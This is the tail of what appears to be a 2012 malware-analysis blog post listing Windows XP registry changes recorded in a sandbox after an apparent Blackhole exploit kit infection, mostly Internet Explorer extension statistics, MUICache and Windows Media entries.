HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore	Time	hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,28,01,	hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,b0,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore	LoadTime	dword:00000088	dword:0000009d
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore	Count	dword:00000003	dword:00000004
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore	Time	hex:dc,07,09,00,06,00,16,00,10,00,10,00,2a,00,c6,03,	hex:dc,07,09,00,06,00,16,00,10,00,1c,00,22,00,04,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore	Count	dword:00000002	dword:00000007
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore	Time	hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,ab,01,	hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,50,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	@xpsp1res.dll,-11005		"Sends and receives e-mail and newsgroup messages."
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\Program Files\Wireshark\wireshark.exe		"Wireshark"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\Program Files\Common Files\Java\Java Update\jucheck.exe		"Java(TM) Update Checker"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\Program Files\Windows Media Player\setup_wm.exe		"Microsoft Windows Media Configuration Utility"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\WINDOWS\system32\taskmgr.exe		"Windows TaskManager"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\WINDOWS\explorer.exe		"Windows Explorer"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	@xpsp3res.dll,-20000		"Network Diagnostics for Windows XP"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	@shell32.dll,-12691		"My Recent Documents"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	@C:\WINDOWS\system32\SHELL32.dll,-9217		"My Network Places"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\WINDOWS\inf\unregmp2.exe		"Microsoft Windows Media Player Setup Utility"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\Program Files\Windows Media Player\wmplayer.exe		"Windows Media Player"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General	UniqueID		"{ECE4B67E-5176-48A8-A4E7-7CD222821F18}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General	ComputerName		"SANDBOX"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General	VolumeSerialNumber		dword:20d334b5
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace	LocalBase	"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"	"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace	DTDFile	"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"	"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace	LocalDelta	"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"	"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace	RemoteDelta	"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"	"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications	"C:\PROGRA~1\WINDOW~2\wmplayer.exe"	"Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications	C:\PROGRA~1\WINDOW~2\wmplayer.exe	"Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications	"C:\Program Files\Windows Media Player\wmplayer.exe"	"Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications	C:\Program Files\Windows Media Player\wmplayer.exe	"Yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\SessionInformation	ProgramCount	dword:00000001	dword:00000005
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache	C:\WINDOWS\explorer.exe		"Windows Explorer"

Hope you found this informative.

Fort Knox Networks

Saturday, September 22, 2012

Blackhole Disk Artifacts - A Complete Dump